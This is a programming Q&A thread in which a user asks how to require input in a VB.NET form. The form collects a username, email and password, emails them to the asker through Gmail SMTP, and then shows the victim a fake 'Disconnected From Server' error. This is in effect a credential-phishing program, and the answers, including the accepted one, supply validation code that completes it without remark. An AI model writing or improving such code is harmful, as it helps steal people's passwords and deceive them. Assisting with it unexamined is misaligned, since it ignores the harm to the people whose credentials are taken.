# Visual Basic code suggestions

Tags: vb.net

Im coding a program in visual basic where a user inputs info and the output is it send it to my email. I have a problem where someone can leave all the text needed to be filled in blank and it sends the email. Here is my code.

```
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    If TextBox1.Text = "" Then
        MsgBox("Username Is Missing")
    Else
    End If
    If TextBox2.Text = "" Then
        MsgBox("Email Is Mising")
    Else
    End If
    If TextBox3.Text = "" Then
        MsgBox("Password Is Mising")
    Else
    End If
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("my email", "my passowrd")
    'using gmail
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("my email")
    mail.To.Add("my email")
    mail.Subject = "Username: " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Email: " & TextBox2.Text & ", " & "Passoword: " & TextBox3.Text
    smtpServer.Send(mail)
    MsgBox("Disconnected From Server, Please try again later!")
```

If someone could tell me the code  to make it where they have to enter in info into all the text boxes to send the email that would be great!

Comment: This question appears to be off-topic because it is about code review and belongs on http://codereview.stackexchange.com/

Answer (score 0, accepted):

you could try this.

```
    If TextBox1.Text = "" Then
        MsgBox("Username Is Missing")
        exit sub
    End If
    If TextBox2.Text = "" Then
        MsgBox("Email Is Mising")
        exit sub
    End If
    If TextBox3.Text = "" Then
        MsgBox("Password Is Mising")
        exit sub
    End If
```

Thanks

Answer (score 0):

```
If String.IsNullOrEmpty (TextBox1.Text) Then
    MsgBox("Username Is Missing")
    TextBox1.Focus()
    Exit Sub
Else If String.IsNullOrEmpty (TextBox2.Text) Then
    MsgBox("Email Is Mising")
    TextBox2.Focus()
    Exit Sub
Else If String.IsNullOrEmpty (TextBox3.Text) Then
    MsgBox("Password Is Mising")
    TextBox3.Focus()
    Exit Sub
End If
```